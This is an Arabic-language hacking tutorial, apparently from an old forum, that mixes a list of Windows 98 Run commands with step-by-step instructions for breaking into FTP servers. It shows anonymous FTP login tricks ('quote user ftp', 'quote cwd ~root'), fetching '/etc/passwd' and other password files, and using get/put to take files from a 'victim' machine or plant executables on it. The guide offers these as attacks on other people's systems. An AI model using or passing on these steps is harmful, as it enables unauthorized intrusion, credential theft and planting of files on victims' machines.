ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
بعدها سنحصل على ملف الباسوورد
قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
cute ftp - ws_ftp
مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
ftp.kahane.org
لتحصل على الملف في التلنت اكتب
retr /etc/passwd
/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0 etc/shadow او etc/passwd Linux etc/shadow او etc/passwd BSD4.3 –RENO etc/master.passwd AIX etc/security/passwd NT ويندوز scripts/passwd
وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها
= = = = تابع = = = =
أغلب استخدامات الدوز والمعروفة
1-command هذا الامر يدخلك الى موجه الدوس . 2-regedit هذا الامر لمحرر سجل الوندووز ( الشجرة ) . 3-icwscrpt هذا الامر خاص بنسخ ملفات الـ dll 4-scandskw هذا الامر لعمل تفحص للاقراص . 5-imgstart هذا الأمر لتشغيل قرص ويندووز المضغوط 6-msiexec حقوق تركيب ويندووز . 7- : d : c للوصول السريع إلى الدرايفرات 8-hwinfo /ui لمعرفة معلومات عن جهازك وفحصه بالكامل عن طريق الدوس واعداد تقرير بذلك 9-cleanmgr وهذا الامر يشغل برنامج تنظيف القرص 10-packager وهذا الامر لبرامج يغير الايقونات 11-recent هذا الامر لإستعراض ملف المستندات ( الموجود في قائمة إبدأ 12-- sysedit هذا الامر(لفتح محرر تكوين النظام) لويندوز 98. حيث يقوم بفتح هذه النوافذ الخمسة التالية : protocol.ini system.ini win.ini config.sys autoexec.bat 13-sfc وهذا الامر لإسترجاع بعض ملفات الـ dll عندما تتلف 14-taskman وهذا الامر لمشاهدة البرامج التي تعمل حاليا 15-debug لمعرفة نوع كرت الفيديو او الشاشة 16-DEFRAG لإلغاء تجزئة القرص 17-DVDPLAY مشغل افلام dvd يعمل مع ملينيوم 18-winipcfg لمعرفة IP 19-TEMP للوصول الى ملفات الويندوز المؤقتة 20-- tuneup هذا الامر لتشغيل برنامج معالج الصيانة 21-mobsync هذا الامر لظهور برنامج تنزيل الصفحات من الانترنت و تصفحها بدون اتصال 22-cdplayer هذا الامر لتشغيل برنامج قاريء الأقراص المضغوطة 23-ftp هذا الامر لجلب البرامج بسرعه من الدوس . 24-Tips.txt هذا الأمر يظهر بعض أسرار ويندووز 98 25-- telnet وهذا الامر يشغل برنامج telnet 26-progman وهذا الامر يأخذك الى قائمة البرامج. 27-drwatson أداة لتشخيص أخطاء النظام. 28-cliconfg. 29-- mkcompat. 30-CVT1.EXE هذا الأمر لتشغيل معالج محول محركات الأقراص إلى نظامfat32 31-SCANREG مدقق تسجيل ويندوزلتفحص التسجيل 32-Tune up هذا الأمر لتشغيل معالج الصيانة ومن مهامه: 1/ تسريع البرامج المستخدمة بشكل متكرر 2/ تدقيق القرص الثابت لاستكشاف الأخطاء 3/ حذف الملفات الغير ضرورية من الجهاز ويمكن استخدام هذا الأمر لنفس الغرض TUNEUP.EXE 34-SYSEDIT محرر تكوين النظام لا ينصح بتغيير أي شيء فيها إلا من قبل الخبراء أو من لديهم معرفة تامة بالتعديلات التي يريدون عملها على هذا المحرر 35-VCMUI أداة تعارض الإصدارة وظيفتها التحقق من الملفات التي لديها رقم إصدارة احدث أو كانت بلغة مختلفة قبل تثبيت النظام لاستعادتها شرح مبسط عن هذه الأداة: أثناء تثبيت برامج جديدة، بما فيها Windows 98، قد يتم الكشف عن الإصدار القديمة لملفات البرامج واستبدالها بالإصدار الجديدة. ويتم إنشاء نسخة احتياطية للإصدارات السابقة وتُحفظ على القرص الثابت. في حال وجدت تعارضات مع ملفات النظام أو ملفات البرامج بعد تثبيت تطبيق، تُستخدم إدارة تعارض الإصدار لاستعادة ملف النسخة الاحتياطية. وتذكر إدارة تعارض الإصدار كافة ملفات النسخة الاحتياطية، وتاريخ إجراء النسخة الاحتياطية، وأرقام الإصدار لملفات النسخة الاحتياطية والملفات الحالية. وعند استعادة ملف النسخة الاحتياطية، حينئذ، يتم إنشاء نسخة احتياطية للإصدار الحالي. ويبقى الإصداران متوفرين. ملاحظة مهمة : يجب استخدام هذه الأداة من قبل شخص لديه معرفة متقدمة بالنظام 36-UPWIZUN إلغاء تثبيت معالج التحديث وظيفته كالتالي: ربما قد استخدمت Windows Update لتثبيت إصدار محدّث من أداة تصحيح، أو برنامج تشغيل، أو أداة نظام. إذا قررت فيما بعد إلغاء تثبيت الإصدار الجديد، ولم تتمكن من إعادة تأسيس الاتصال بإنترنت، استخدم إلغاء تثبيت معالج التحديث للعودة إلى الإصدار السابق. 37-Asd.exe
بسم الله الرحمن الرحيم اليوم بعلمكم طريقة إقتحام عبر فتيبي FTP أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت 21 مفتوح و هو البورت الخاص بــ FTP و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها Superscanne بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي إضغط على Start ثم Run ثم اكتب ftp –n تطلع لك نافدة في الدوس مكتوب عليها FTP> لحد هنا كل شيء تمام و بعدين اكتب Open ثم إضغط على إدخال Enter تتحصل عب النتيجة التالية FTP> To أكتب جنب To رقم IP الضحية ثم إضغط على إدخال و الحين اهم جزء
إدا تحصلت على هذا الرد فقد تخطيت خطوة Connected to www.assassin.com 220 websrv1 Microsoft FTP Service (Version 4.0). و الآن أكتب الكتابة التالية ftp>quote user ftp إدا تحصلت على هذا الرد فقد تخطيت خطوة 331 Anonymous acces allowed, send identify (e-mail name) as password. و الآن أكتب الكتابة التالية ftp>quote cwd ~root إدا تحصلت على هذا الرد فقد تخطيت خطوة 530 Please login with USER and PASS ثم أكتب الكتابة التالية ftp>quote pass ftp إدا تحصلت على هذا الرد فقد تخطيت خطوة و نجحت في الإقتحام يعني الاختراق
230 Anonymous user logged in. مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه ما عليك الآن الا ان تقوم بإستعمال اوامر الفتيبي و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق
Pwd لكي تعر ما يحتويه الهارد ديسك Cd لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Ls لكي يتضح لك محتوى المجلد أو الهارد ديسك Get لكي تحمل الى سطح المكتب بتاع جهازك مثال Get black.exe Put العملية الع**ية ل Get يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في في جهاز الضحية مثال Put black.exe Clos لقطع الإتصال مع الضحية
هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها Codes: Signification: 110 Restart marker reply. 120 Service ready in nnn minutes. (nnn est un temps) 125 Data connection already open; transfer starting. 150 File status okay; about to open data connection. 200 Command okay. 202 Command not implemented, superfluous at this site. 211 System status, or system help reply. 212 Directory status. 213 File status. 214 Help message. 215 NAME system type. 220 Service ready for new user. 221 Service closing control connection. 225 Data connection open; no transfer in progress. 226 Closing data connection. 227 Entering passive mode (h1, h2, h3, h4, p1, p2). 230 User logged in, proceed. 250 Requested file action okay, completed. 257 "PATHNAME" created. 331 User name okay, need password. 332 Need account for login. 350 Requested file action pendingfurther information. 421 Service not available, closing control connection. 425 Can't open data connection. 426 Connection closed; transfer aborded. 450 Requested file action not taken. (Fichier déjà utilisé par autre chose) 451 Requested action aborded: local error processing. 452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action) 500 Syntax error, command unrecognized. 501 Syntax error in parameters or arguments. 502 Command not implemented. 503 Bad sequence of commands. 504 Command not implemented for that parameter. 530 Not logged in. 532 Need account for storing files. 550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...) 551 Requested action aborded: page type unknown. 552 Requested file action aborded